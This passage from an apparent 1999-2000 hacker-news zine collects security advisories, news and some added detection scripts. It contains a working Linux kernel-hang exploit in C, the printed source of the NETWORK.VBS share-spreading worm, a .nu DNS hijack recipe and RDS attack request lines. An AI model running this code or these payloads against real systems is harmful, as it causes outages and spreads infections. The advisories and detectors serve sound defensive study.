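1999-07-20 03:14:09 10.0.0.5 GET /scripts/tools/newdsn.exe driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq=c%3A%5Csys.mdb&newdb=CREATE_DB&attr= 200 -
1999-07-20 03:14:12 10.0.0.5 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200 ACTIVEDATA
1999-07-20 03:15:00 10.0.0.9 GET /iissamples/default/welcome.htm - 200 Mozilla/4.0
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: {f.client}: {f.reason}")
```

     The detector keys on the URI, not on the ACTIVEDATA user agent, because
     that agent string is what every RDS client sends and the script can set
     anything it likes; any POST to the msadcs.dll object methods from the
     public side is the signal, and the newdsn.exe hit a few seconds earlier
     from the same client is the corroboration.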
     
          
     @HWA     
     
159.0 Hijack any .nu domain box (DoS/redirection/hijack)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source:http://packetstorm.securify.com/9902-exploits/domain.nu.DoS.txt
      Recent
      Submitted by: Internal 
      
      Date: Sat, 20 Feb 1999 21:20:13 -0800
      From: Shane Wegner <shane@CM.NU>
      To: BUGTRAQ@netspace.org
      Subject: Possible DOS attack in the .nu domain service
      
      Hello all,
      
      I am not sure if this is known or even relevant to the list and if not,
      please excuse this post.
      
      There appears to be a bug in the niu DNS setup process which could result
      in a DOS attack for those using their domains.  For those unfamiliar with
      niu, they provide sub-domain service under the .nu domain to machines
      which do their own DNS.  I have written to them on several occasions about
      this issue but as of yet have received no response.
      
      OK the bug is that any user who is willing to pay the $25 to register a
      .nu domain can knock out or redirect a host under another.  This is best
      shown through an example.
      
      I register mycompany.nu and in the registration form enter the hosts I
      have doing the DNS for it.
      
      Name: mycompany.nu
      DNS1: machine.someserver.com
      DNS2: machine2.someserver.com
      
      After this step, my DNS entry in the .nu table looks like this
      
      $ORIGIN nu.
      mycompany       IN      NS      machine2.someserver.com.
                      IN      NS      machine2.someserver.com.
      
      mycompany.nu for the sake of this example had the following DNS table.
      
      $ORIGIN nu.
      mycompany       IN      SOA     mymachine.mycompany.nu. hostmaster.mycompany.nu. (
                      1 301 120 604800 600 )
                      IN      NS      machine1.someserver.com. 
                      IN      NS      machine2.someserver.com.
      $ORIGIN  mycompany.nu.
      mymachine       IN      A       192.168.1.1
      
      So all's well until someone registers evil.nu with the goal of knocking out
      myserver.mycompany.nu.  On the form, they enter the following.
      
      name: evil.nu
      DNS1: mymachine.mycompany.nu
      DNS1IP: 127.0.0.1
      
      Now here's the bug, if you enter an IP for a machine which falls under the
      .nu name-space, it maps it statically.  It does not check to see if it
      falls under your name-space.  Therefore, our evil.nu entry in the .nu
      table looks like this.
      
      $ORIGIN nu.
      evil            IN      NS      mymachine.mycompany.nu.
      $ORIGIN mycompany.nu.
      mymachine       IN      A       127.0.0.1
      
      So the IP for mymachine.mycompany.nu has been redirected from its
      192.168.1.1 to 127.0.0.1.  An attacker could conceivably redirect the mail
      servers of a company to his own machine or anything to that effect.
      
      Regards,
      Shane
      
      -- 
      Shane Wegner: shane@cm.nu
      Tel: (604) 930-0530
      Sysadmin, Continuum Systems: http://www.cm.nu
      Personal website: http://www.cm.nu/~shane
      ICQ UIN: 120000
      PGP: keyid:       2048/F5C2BD91
           Fingerprint: 8C 48 B9 D8 53 BB D8 EF
                        76 BB DB A2 1C 0D 1D 87
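
      The check the registration form is missing, as an added example (it is
      not part of Shane's post and not niu's code): the form fields and the
      .nu zone layout are taken from the post above, the function and class
      names are assumptions. Glue A records are written into the parent zone
      only for nameserver hosts that sit inside the domain being registered.

```python
"""
Bailiwick check for registrar glue records (added example, not the
registrar's code).

Assumed input: a registration request carrying the domain name, its
nameserver hostnames and optional IPs, as in the .nu form described
above. A glue A record is emitted only when the nameserver host is
inside the registered domain; an IP supplied for a host outside it is
rejected instead of being written statically into the parent zone.
"""
from __future__ import annotations

from dataclasses import dataclass, field

TLD = "nu"


def _labels(name: str) -> list[str]:
    """Normalise a DNS name to lower-case labels without the trailing dot."""
    return [lab for lab in name.lower().rstrip(".").split(".") if lab]


def in_bailiwick(host: str, domain: str) -> bool:
    """True if host equals domain or is a subdomain of it (label-wise)."""
    h, d = _labels(host), _labels(domain)
    return len(h) >= len(d) and h[-len(d):] == d


@dataclass
class Registration:
    name: str                      # e.g. "mycompany.nu"
    nameservers: list[str]         # DNS1, DNS2, ...
    glue: dict[str, str] = field(default_factory=dict)  # DNSnIP: host -> IP


def build_delegation(reg: Registration) -> tuple[list[str], list[str]]:
    """
    Return (zone_lines, rejected) for the parent (.nu) zone.
    Glue is accepted only for hosts under reg.name; anything else is
    reported in `rejected` and never written to the zone.
    """
    if not in_bailiwick(reg.name, TLD) or len(_labels(reg.name)) != 2:
        raise ValueError(f"{reg.name} is not a second-level {TLD} domain")
    owner = _labels(reg.name)[0]
    lines = [f"$ORIGIN {TLD}."]
    for ns in reg.nameservers:
        lines.append(f"{owner:<15} IN      NS      {ns.rstrip('.')}.")

    rejected: list[str] = []
    glue_lines: list[str] = []
    for host, ip in reg.glue.items():
        if in_bailiwick(host, reg.name):
            # Owner name relative to the registered domain ("@" for the apex).
            rel = ".".join(_labels(host)[:-len(_labels(reg.name))]) or "@"
            glue_lines.append(f"{rel:<15} IN      A       {ip}")
        else:
            rejected.append(f"{host} -> {ip}: host is outside {reg.name}")
    if glue_lines:
        lines.append(f"$ORIGIN {reg.name.rstrip('.')}.")
        lines.extend(glue_lines)
    return lines, rejected


if __name__ == "__main__":
    # The evil.nu registration from the post: glue for a host the
    # registrant does not control must be refused.
    evil = Registration("evil.nu", ["mymachine.mycompany.nu"],
                        {"mymachine.mycompany.nu": "127.0.0.1"})
    zone, bad = build_delegation(evil)
    print("\n".join(zone))
    print("rejected:", bad)
```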
      
      @HWA           
      
160.0 The dreaded and most pheared return of the infamous GOAT!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by Debris 

      From the new website:
      
      note: this text has been modified from its original form, it has been
            formatted to fit your screen. - Ed
            
      http://www.goat-advisory.org/
     
      January 1998, an EFNET channel was created, #feed-the-goats. From that 
      emerged a webpage, http://goat.sphix.com. The purpose of that page was to 
      mock, satirize and piss off the 'underground community'. As we grew in 
      popularity, people who were NOT members began defacing websites under the 
      fair name of g0at. Goat security then created a hoax where it was 
      believed Yahoo was cracked. Goat security's popularity skyrocketed after 
      such incidents. 

      Text files, code and advisories were created daily and the archive became 
      rather plentiful, however, problems arose which are described in 
      g0at-quit.txt leading to the end of g0at. The press release states that 
      g0at security will never return. Well it is time to anule that.       G0at 
      security has returned. 

      For many months people have been begging for the return of g0at security. 
      We have finally caved in. We are in the process of salvaging old text 
      files, images etc... If you have anything created by us, please visit 
      #feed-the-goats key: blaq, immediately and speak with Debris. 

      The 'underground community' has fallen apart. The clueless run amok and 
      give people with direction, goals, and knowledge, a bad name to the 
      general public. The media has the absolute wrong impression of 'hackers' 
      as you most likely have heard many rant about before (I will not 
      bore you with IRC politics/drama). G0at security is back to start up where 
      we left off. Lightening up the world and spreading joy while pissing most 
      people off. 

      We are not a defacing group, a ./hacking group or anything else similar to 
      that. Do not bug us with questions pertaining to this. We want nothing to 
      do with this other than mocking it. 

      Coming soon:  Various new text files, new members, new webdesign, archive 
      of salvaged material. 

      debris@total.net   
      
      -=-
      
      http://www.hackernews.com/defaced/1999/yahoo0399/
      
      Original quit text:
      
      ///////////////////////////////////////////
       GGGGGG   OOOOOOO  AAAAAAAA  TTTTTTTTTT
        G        O     O  A      A     TT
         G  GGG   O     O  AAAAAAAA     TT
          G    G   O     O  A      A     TT
            GGGGGG  OOOOOOO  A      A     TT
      \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
      
              Due to recent events, the downfall of g0at security has become 
              imminent. 

              These incidents include:

              - Legal problems of some of our members.
              - Recent hacking crack downs launched by many governments.
              - The recent takeover of our channel, #feed-the-goats (Efnet).
              - Losing our server due to a sloppy hack by one of our members
                (/me looks away).
              - Losing our text files due to our domain being wiped off the
                server.
              - Fights and disappearances of some of our members.
              - The maturing of our members.

              g0at security hereby announces its closure. By this we do not 
              mean we are going legit, we are finished. Unlike other groups we 
              most likely will not spawn back.

      [Brief history of g0at security]

              One day in Feb. I believe, ech0 and myself (Debris), decided to 
              irc. ech0 informed me that he occasionally hung out in a channel he, 
              himself created called #feed-the-goats. From there, members of a 
              popular group, HcV along with members of Global Hell, began 
              coming. ech0 and myself decided that we wanted to be as elite as 
              our peers in #rootworm, so we made a webpage. The purpose of the 
              page was to mock and satirize hacker culture in general. Our first 
              document entitled "g0at declares war on LoU" mocked the Legion of 
              the Underground's new attempt at becoming legit among a handful of 
              other aspects of their organization. Our original 
              url (goat.sphix.com) quickly grew in size and popularity, and our 
              channel became more populated. The hacks began soon after, some by 
              members and a lot by non-members. g0at's highpoint came soon after 
              the controversial yahoo hack. Our popularity skyrocketed and the 
              name g0at became known to all (unfortunately we got all the l33t0s 
              in our channel and wouldn't go away). The fun and games continued 
              up until April, when all the 'incidents' began. Then May was the 
              last straw.

      [Where do we go from here]

              Most members will most likely go their own ways. Many still hang 
              in #feed-the-goatz (our new channel). No more text releases will 
              come from g0at, our webpage will remain down, our archive on 
              attrition.org will stay the same and nothing will be heard of us 
              as a group.

      [Thanks and greets]

              Thanks to all that supported our group and enjoyed the text we 
              wrote to amuse the unintelligent. Greets to all our 12 members, 
              HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining 
              us for hours with your hacker journalism. And thanks to all the 
              rest.

      
      Finally.... it's been fun. It's been awesome being associated with g0at.

      You can still reach us at g0at@attrition.org for further questions or 
      comments or whatever (I just want email)

      
      g0at----------------------------------------------------------------------
      
      
      []=Debris=[]
      debris@attrition.org    
      
      @HWA
      
161.0 b0f: exploit code to hang any linux machine by eth0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      b0f now has its own section on PSS, only a few files are currently hosted
      but we expect the library will be updated in the future.
      
      http://packetstorm.securify.com/advisories/b0f/
      

      /*            [http://b0f.morphed.net] - eth0                         */
      /*                                                                    */
      /* Vulnerable:
           Linux 2.2.12
           Linux 2.2.13
           Linux 2.2.14
           Linux 2.3.99-pre2

         The following exploit code will hang any Linux machine on various
         Pentium platforms.  Note that this does not require any special
         privileges, and any user can compile and run it, so watch out
         kiddies...

         The send system call immediately puts the kernel in a loop spewing
         "kmalloc: Size (131076) too large" forever (or until you hit the
         reset button).

         Apparently UNIX domain sockets are ignoring the
         /proc/sys/net/core/wmem_max parameter, despite the documentation to
         the contrary.

          [code provided by eth0 from b0f security]
          [information provided by Jay Fenlason]
               [http://b0f.morphed.net]
             [buffer0verfl0w security]
      */

      #include <sys/types.h>
      #include <sys/socket.h>
      #include <string.h>

      /* 128 KB payload: far larger than the datagram size wmem_max is
         documented to cap */
      char buf[128 * 1024];

      int main ( int argc, char **argv )
      {
          struct sockaddr SyslogAddr;
          int LogFile;
          int bufsize = sizeof(buf)-5;
          int i;

          /* fill the buffer with printable characters */
          for ( i = 0; i < bufsize; i++ )
              buf[i] = ' '+(i%95);
          buf[i] = '\0';

          /* one datagram to the syslog socket /dev/log */
          SyslogAddr.sa_family = AF_UNIX;
          strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
          LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
          sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
          return 0;
      }
              
      @HWA         
      
162.0 HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
   
      contributed by Brian 
      The National Infrastructure Protection Center has identified a new
      self replicating script (hmmm, they don't call it a virus?). The Alert
      issued by NIPC says that the new script will erase hard drives and
      dial 911 emergency systems. The script seems to only affect systems
      running Windows that are setup with file and print sharing.
      
      NIPC
      ZD Net
      Symantec
      Network Associates
      PC Help
      
      http://www.nipc.gov/nipc/advis00-038.htm
      http://www.zdnet.com/zdnn/stories/news/0,4586,2504397,00.html?chkpt
      http://www.symantec.com/avcenter/venc/data/bat.chode.worm.html
      http://vil.nai.com/vil/wm98557.asp
      http://pc-help.org/news/scriptworm.htm
      ----------
      
      NIPC (Gotta love their melodramatic all-caps eh? heh -Ed)

      SUBJECT: NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM 
      ADVISORY (NIPC ADVISORY 00-038); SELF-PROPAGATING 911 SCRIPT

      1. A RECENT AND BREAKING FBI CASE HAS REVEALED THE CREATION AND 
      DISSEMINATION OF A SELF-PROPAGATING SCRIPT THAT CAN ERASE HARD DRIVES AND 
      DIAL-UP 911 EMERGENCY SYSTEMS. WHILE INVESTIGATION AND TECHNICAL 
      ANALYSIS CONTINUE, THE SCRIPT APPEARS TO INCLUDE THE FOLLOWING 
      CHARACTERISTICS:

      A. ACTIVELY SEARCH THE INTERNET FOR COMPUTER SYSTEMS SET UP FOR FILE AND 
      PRINT SHARING AND COPY ITSELF ON TO THESE SYSTEMS.

      B. OVERWRITE VICTIM HARD DRIVES.

      C. CAUSE VICTIM SYSTEMS TO DIAL 911 (POSSIBLY CAUSING EMERGENCY 
      AUTHORITIES TO CHECK OUT SUBSTANTIAL NUMBERS OF "FALSE POSITIVE" CALLS).

      2. TO THIS POINT CASE INFORMATION AND KNOWN VICTIMS SUGGEST A RELATIVELY 
      LIMITED DISSEMINATION OF THIS SCRIPT IN THE HOUSTON, TEXAS AREA, THROUGH 
      SOURCE COMPUTERS THAT SCANNED SEVERAL THOUSAND COMPUTERS THROUGH 
      FOUR INTERNET SERVICE PROVIDERS (AMERICA ON-LINE, AT&T, MCI, AND NETZERO). 
      DISSEMINATED SCRIPT MAY BE PLACED IN HIDDEN DIRECTORIES NAMED CHODE, 
      FORESKIN OR DICKHAIR. FURTHER SCRIPT ANALYSIS BY THE FBI/NIPC CONTINUES.

      3. FBI/NIPC REQUESTS RECIPIENTS IMMEDIATELY REPORT INFORMATION RELATING TO 
      USE OF THIS SCRIPT TO THE LOCAL FBI OR FBI/NIPC WATCH AT 
      202-323-3204/3205/3206. AS MORE TECHNICAL OR OPERATIONAL INFORMATION 
      ABOUT THIS SCRIPT DEVELOPS, NIPC WILL DISSEMINATE THIS INFORMATION THROUGH 
      THE CARNEGIE MELLON CERT, ANTIVIRUS VENDORS OR ITS OWN WEB SITE 
      (www.nipc.gov), AS APPROPRIATE.      
      
      -=-
      
      pc-help;
      
      VBScript Worm Infects Open Shares

      Thursday, 24 February 2000

      While inspecting a client's misbehaving computer this evening, I found a 
      little surprise. His StartUp group contained a Visual Basic script which 
      on inspection proved to be a rather simple, self-replicating and 
      self-transmitting worm.

      The client's system had a shared C: drive with no password, cause unknown. 
      The worm had either been placed on his system (no evidence so far of a 
      trojan but we've yet to do thorough scans) or it had arrived by reason of 
      its own action.

      

      How It Works

      The script resides in the StartUp group of the Start Menu and is therefore 
      run at each reboot. The filename is NETWORK.VBS.

      The script creates a log file, C:\NETWORK.LOG, which it erases and 
      re-creates upon each new execution. 

      The script generates a random Class C subnet address and enters it in the 
      log. This address is the first three numbers of the usual four-part IP 
      address. It then steps thru all 255 addresses in that subnet. It blindly 
      attempts to map a shared C: drive at the remote address to local 
      drive letter J: at each address in turn. It checks each time to verify the 
      successful creation of a drive J: on its host.

      If it has not connected, it repeats the process at the next address in 
      sequence. When it has stepped thru all 255 addresses of the current 
      subnet, it creates another random subnet address, enters it in 
      NETWORK.LOG, and continues attempting connections on the new subnet.

      If it succeeds in mapping a remote drive, the script then attempts to copy 
      itself to a series of likely locations on that drive.

      Its first act is to place a copy of itself in the root directory of drive 
      J:. If the file makes the journey, the script logs its success.

      Then it copies itself to the following folders, most of them targeting the 
      StartUp group which will cause persistent execution of the script at every 
      reboot:

      j:\windows\startm~1\programs\startup\
      j:\windows\
      j:\windows\start menu\programs\startup\
      j:\win95\start menu\programs\startup\
      j:\win95\startm~1\programs\startup\
      j:\wind95\

      The script then disconnects, effectively removing drive J:.

      It then goes back to work "scanning" addresses without cease.

      Incidentally, if the host system has a drive using the letter J: the 
      script will fail to propagate.

      Here are the contents of NETWORK.LOG as found on my client's system:

      Log file Open
      Subnet : 211.203.133.0
      Subnet : 203.251.228.0
      Subnet : 201.244.147.0
      Subnet : 204.97.180.0

      This particular log reflects the fact that the worm had no success 
      transferring itself during its last session. The system had been rebooted 
      about two hours or so before, and had been offline most of that time. The 
      script had tried only about 1000 addresses in that period. This 
      small number was presumably because of the delay, usually about 10 
      seconds, resulting from a connection attempt to a nonexistent host.

      

      The Script

      My analysis is in the lines marked with // (blue text in the original page).

      Note: A single small alteration of this code renders it impotent. The 
      remainder has been left intact for the benefit of well-intentioned 
      readers.

      dim octa
      dim octb
      dim octc
      dim octd
      dim rand
      dim dot
      dim driveconnected
      dim sharename
      dim count
      dim myfile                    // Creates a bunch of variables.
      count = "0"
      dot = "."
      driveconnected="0"
      set wshnetwork = wscript.createobject("wscript.network")
      Set fso1 = createobject("scripting.filesystemobject")
      set fso2 = createobject("scripting.filesystemobject")
                                    // Sets a bunch of variables.
      on error resume next
      randomize
      checkfile()       // Erases and then re-creates its log file, c:\network.log.
      randaddress()     // Generates a random Class C subnet address (that's a
                        // block of 255 addresses).
      checkaddress()    // Increments the IP address by one; and creates a new
                        // random subnet if this one's been covered.
      shareformat()     // Creates a textstring, using the current IP address,
                        // which will be used to map a shared drive.
      wshnetwork.mapnetworkdrive "j:", sharename
                        // Maps the shared drive to J:, blindly assuming there's
                        // one at the address.
      enumdrives()      // Checks to see if it's successfully mapped the drive.
      copyfiles()       // Places a copy of itself in several places on the
                        // drive (someone else's machine someplace).
      disconnectdrive() // Drops the connection.
      msgbox "Done"

      function disconnectdrive()
          wshnetwork.removenetworkdrive "j:"
          driveconnected = "0"
      end function

      function createlogfile()
          Set myfile = fso1.createtextfile("c:\network.log", True)
      end function

      function checkfile()
          If (fso1.fileexists("c:\network.log")) then
              fso1.deletefile("c:\network.log")
              createlogfile()
          else
              createlogfile()
          end If
          myfile.writeLine("Log file Open")
      end function

      function copyfiles()
          myfile.writeline("Copying files to : " & sharename)
          Set fso = CreateObject("scripting.filesystemobject")

          fso.copyfile "c:\network.vbs", "j:\"

          If (fso2.FileExists("j:\network.vbs")) Then
              myfile.writeline("Successfull copy to : " & sharename)
          End If

          fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
          fso.copyfile "c:\network.vbs", "j:\windows\"
          fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
          fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
          fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
          fso.copyfile "c:\network.vbs", "j:\wind95\"
      end function

      function checkaddress()
          octd = octd + 1
          if octd = "255" then randaddress()
      end function

      function shareformat()
          sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
      end function

      function enumdrives()
          Set odrives = wshnetwork.enumnetworkdrives
          For i = 0 to odrives.Count -1
              if sharename = odrives.item(i) then
                  driveconnected = 1
              else
                  ' driveconnected = 0
              end if
          Next
      end function

      function randum()
          rand = int((254 * rnd) + 1)
      end function

      function randaddress()
          if count > 50 then
              octa=Int((16) * Rnd + 199)
              count=count + 1
          else
              octa="255"
          end if
          randum()
          octb=rand
          randum()
          octc=rand
          octd="1"
          myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
      end function

      Why did I publish this code?

      

      Comments

      This is the first worm I've seen that was targeted to take advantage of 
      open (sans password) shares. I have no idea whether similar exploits exist 
      nor whether anyone else has spotted this particular creature. (25 Feb: I 
      now know that this worm has been known to AV vendors for several 
      days. Most of them have issued patches for its detection.)

      In my opinion, any working copy of this worm is almost certain to 
      replicate itself on several other machines before it's detected by the 
      user, so it is probably spreading at a steady -- perhaps even exponential 
      -- rate.

      It's impossible to estimate the incidence of open shares with certainty; 
      but I've poked around looking for them a time or two in an effort to 
      estimate them; so I think I can hazard an educated guess. I'd say one or 
      two addresses in a thousand harbor a system with open shares, and a 
      significant percentage of those will permit access to the entire C: drive. 
      While online this worm might easily scan several thousand potential 
      victims in the course of a few hours, which means that an undetected worm 
      residing on a system that's online several hours a day has a high 
      probability of replicating itself something like once every day or two.

      The capability to run these scripts is installed with Internet Explorer 5. 
      I'm not sure about IE4. I believe this means that Win98 systems are much 
      more likely than Win95 machines to have the Windows Script Host installed. 
      So the script won't run on a significant proportion of the "legacy" 
      systems which were more easily misconfigured for open shares. This could 
      reduce its rate of propagation.

      25 Feb: UseNet reports indicate that this worm can cause slowdowns on a 
      LAN. It stands to reason! As reported by NAI at 
      http://vil.nai.com/vil/vbs98477.asp, the effect of the worm's simultaneous 
      action on numerous systems on a network may overload or crash 
      servers which receive a flood of DNS requests resulting from the script's 
      activity.

      Note that in systems with Windows Script Host installed, there will be a 
      file named NETWORK.VBS in the Windows directory. Don't be alarmed. This is 
      a harmless sample script. If you're infected, the bad guy will be in the 
      StartUp folder and in the root directory.

      Removal

      To kill the script, move it out of the StartUp folder and reboot. If 
      Windows won't allow this, reboot to MS-DOS (don't just open a DOS window) 
      and type this command:

      ren \windows\startm~1\programs\startup\network.vbs network.txt

      Hit Enter. If no error message displays, it worked. Now when you restart 
      Windows, the script will not run, instead it will open up for examination 
      in Notepad. If it's not identical to the one I've quoted above, I'd 
      appreciate it if you'd send me a copy.

      In Sum

      The worm script does nothing nefarious aside from taking up bandwidth on 
      the Net link and consuming some processing power on the host system. But 
      it may have been responsible for some annoying lockups that were observed 
      on my client's system.

      Fortunately it doesn't phone home, nor otherwise serve to advertise the 
      victim's open shares. But it could easily do so with simple additions. So 
      it illustrates a rather serious potential for exploit. In fact, given 
      history, I consider it a positive certainty that more hostile 
      versions of this thing will appear.

      A worm like this with phone-home or broadcast features might spread far 
      and wide, and report on open shares on a huge scale. It would probably lay 
      a lot of people open to near-certain intrusion. It should stand as a grim 
      reminder of the potential seriousness of open shares.

      Anyone who simply ensures they're not sharing their entire C: drive with 
      write permission on the Internet link has nothing to fear from this worm. 
      If it writes to a shared subdirectory or to another drive, it won't run.

      For more on open shares and their solutions, see my page titled File And 
      Printer Sharing And The Internet.

      I am suddenly very interested in this sort of scripting. If you too would 
      like to investigate it in greater detail, here are some useful links:
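
      The worm's propagation pattern is also its signature on the wire: one
      source trying consecutive addresses of a random /24 on the SMB port, ten
      seconds or so apart. The following detection routine, an added example
      that is not from the pc-help page or the NIPC advisory, runs that check
      over constructed firewall log lines (the log format and the hosts are
      made up for the example):

```python
"""
Detecting NETWORK.VBS-style share sweeps in connection logs
(added example; the log format below is constructed, not a real product's).

The worm picks a random /24, then tries to map \\a.b.c.d\C for
d = 1..254 in order. Each attempt is an SMB session (TCP 139 on the
Windows 9x systems it targeted, 445 on later Windows), so an infected
host shows up in firewall or flow logs as a single source hitting
consecutive addresses of one /24 on an SMB port.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample: "<time> <src> -> <dst>:<port> <verdict>"
# 10.0.0.5 behaves like an infected host; 10.0.0.9 is ordinary file-server use.
SAMPLE_LOG = """\
12:00:01 10.0.0.5 -> 211.203.133.1:139 DROP
12:00:11 10.0.0.5 -> 211.203.133.2:139 DROP
12:00:21 10.0.0.5 -> 211.203.133.3:139 DROP
12:00:31 10.0.0.5 -> 211.203.133.4:139 DROP
12:00:41 10.0.0.5 -> 211.203.133.5:139 DROP
12:00:51 10.0.0.5 -> 211.203.133.6:139 DROP
12:01:01 10.0.0.5 -> 211.203.133.7:139 DROP
12:01:11 10.0.0.5 -> 211.203.133.8:139 ACCEPT
12:01:30 10.0.0.9 -> 10.0.0.1:139 ACCEPT
12:01:35 10.0.0.9 -> 10.0.0.2:139 ACCEPT
12:02:00 10.0.0.7 -> 192.0.2.10:80 ACCEPT
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) (?P<verdict>\w+)$"
)
SMB_PORTS = {139, 445}


def parse_log(text):
    """Yield (src, dst, port) for every SMB connection attempt in the log."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # skip unparsable lines rather than failing the run
        port = int(m["port"])
        if port in SMB_PORTS:
            yield m["src"], ip_address(m["dst"]), port


def longest_consecutive_run(values):
    """Length of the longest run of consecutive integers in `values`."""
    s = set(values)
    best = 0
    for v in s:
        if v - 1 in s:
            continue            # not the start of a run
        length = 1
        while v + length in s:
            length += 1
        best = max(best, length)
    return best


def find_share_sweeps(text, min_run=5):
    """
    Return {src: [subnet, ...]} for sources that tried at least `min_run`
    consecutive host addresses (d, d+1, d+2, ...) within one /24 on an
    SMB port. Requiring a consecutive run keeps ordinary traffic to a few
    scattered file servers from being flagged.
    """
    offsets = defaultdict(set)          # (src, /24) -> host offsets seen
    for src, dst, _port in parse_log(text):
        net = ip_network(f"{dst}/24", strict=False)
        offsets[(src, net)].add(int(dst) - int(net.network_address))

    hits = defaultdict(list)
    for (src, net), seen in offsets.items():
        if longest_consecutive_run(seen) >= min_run:
            hits[src].append(str(net))
    return dict(hits)


if __name__ == "__main__":
    for src, nets in find_share_sweeps(SAMPLE_LOG).items():
        print(f"{src} swept {', '.join(nets)} on SMB ports")
```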

      
      
      
      @HWA
      
      
163.0 HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by g.machine()
      The district court of Hannover Germany has sentenced the creator of
      Tribe Flood Network, the tool allegedly used in the recent massive
      DDoS attacks, to six months youth punishment on probation. Mixter
      was accused of "computer sabotage" and "spying on data". However, the
      trial had nothing to do with the recent attacks on major internet
      sites, such as CNN or eBay, Mixter was sentenced due to a felony that
      happened two years ago. In 1998 he repeatedly broke into several
      company systems and spied on their data.
      
      Heise - German
      Yahoo News - German
      
      http://www.heise.de/newsticker/data/pab-31.03.00-000/
      http://de.news.yahoo.com/000331/33/o0fp.html
      ----------
      
      Friday, March 31, 2:53 PM


      Juvenile sentence for well-known computer hacker "Mixter"

      Hanover (dpa) - The well-known hacker "Mixter" has been sentenced in 
      Hanover to a six-month juvenile sentence on probation. The 21-year-old 
      caused "considerable damage" through computer sabotage, the judgement 
      says. "Mixter" became known after the recent hacker attacks on American 
      Internet companies. He had written the TFN program used for them. With 
      it the Internet portal Yahoo, the online stock broker E*Trade, the 
      bookseller Amazon.com and the news service CNN.com were paralysed for 
      hours. 

      -=-

      Babelfish's almost-English version:

      In English: (Well sorta) heh


      Friday March 31, 2:53 PM 

      Youth punishment for well-known computer hacker " Mixter " Hanover (dpa) - 
      the well-known hacker " Mixter " was condemned in Hanover to a youth 
      punishment by six months on probation. The 21-Jaehrige caused, is called 
      considerable damage " with computer sabotage " it in the judgement. Admits 
      became " Mixter " after the recent hacker attacks on American Internet 
      companies. It had prepared the program TFN used for it. Thus the Internet 
      portal Yahoo, the on-line stock broker E*Trade, the bookseller Amazon.com 
      and the intelligence service NCN.com were for hours lamely put.       
      
      @HWA
      
164.0 HNN:Apr 3rd:Forget Cookies, Worry About Cache 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by evenprime 
      Those of us who place a high value on our privacy usually have cookies
      turned off within our browsers. However web sites can still track you
      your visits by looking at your cache. Web sites are able to check HTTP
      cache-control headers such as If-Modified-Since to track individual
      users.
      
      Linux Care
      
      http://www.linuxcare.com.au/mbp/meantime/
      ----------
      
      meantime: non-consensual http user tracking using caches
      
      From WordNet (r) 1.6 [wn]:
     
     mean
     
       2: characterized by malice; "a hateful thing to do"; "in a mean
          mood"; "told spiteful stories about the fat lady" [syn: {hateful},
           {spiteful}]
       3: having or showing a  meanspirited lack of honor or morality;
       4: (slang) excellent; "famous for a mean backhand"

     time
     
       5: the continuum of experience in which events pass from the
          future through the present to the past
    

      
      executive summary

           HTTP cache-control headers such as If-Modified-Since allow servers to 
           track individual users in a manner similar to cookies, but with less 
           fewer constraints. This is a problem for user privacy against which 
           browsers currently provide little protection. 

      introduction

      Some people would like to be anonymous as they use the web, and other 
      people would like to prevent anonymous access for various reasons. 
      Consider, for example, an internet marketing company that wants to chain 
      together visits to various web sites by a user so as to build a 
      fuller profile of their interests and usage patterns. Conversely, a web 
      user might not wish to leak such information to a site because they are 
      looking at controversial information, desire a good negotiating position, 
      or see privacy as a moral right. 

      An arms race in techniques for providing and stripping away anonymity has 
      developed over the years. This black paper discusses what is believed to 
      be a new technique for tracking clients and possible responses. 

      problem statement

           Alice is browsing the web; Bob runs a number of otherwise-unrelated 
           web servers. Alice makes several requests to Bob's servers over time. 
           Bob would like to tie together as many as possible of the requests 
           made by Alice to learn more about Alice's usage patterns 
           and identity: we call this identifying the request chain. Alice would 
           like to access Bob's servers but not give away this information.

      There are many perfectly good reasons why in a particular situation B 
      might want to know A's identity, or at least a unique pseudonym. If B 
      explains the reasons why tracking is required, then A can consent to and 
      allow tracking in various ways. There are several less savory 
      possibilities when A does not consent to the tracking or does not realize 
      that a single chain can be found across apparently unrelated servers 
      controlled by B. 

      The scenario poses an interesting information-theory and game-theory 
      challenge in anonymity. It is also immediately practical: there is a good 
      deal of development being done in aid of both Alice and Bob. 

      existing approaches

      cookies

      The standard approach for associating user requests across several 
